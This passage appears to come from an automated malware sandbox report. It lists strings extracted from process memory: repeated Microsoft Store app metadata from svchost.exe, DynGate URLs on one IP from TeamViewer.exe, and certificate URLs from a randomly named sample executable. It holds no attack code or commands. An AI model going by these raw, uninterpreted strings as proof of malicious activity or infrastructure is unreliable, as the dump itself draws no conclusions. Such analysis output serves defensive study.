music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/32172969&client=DynGate&p=10000002v
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
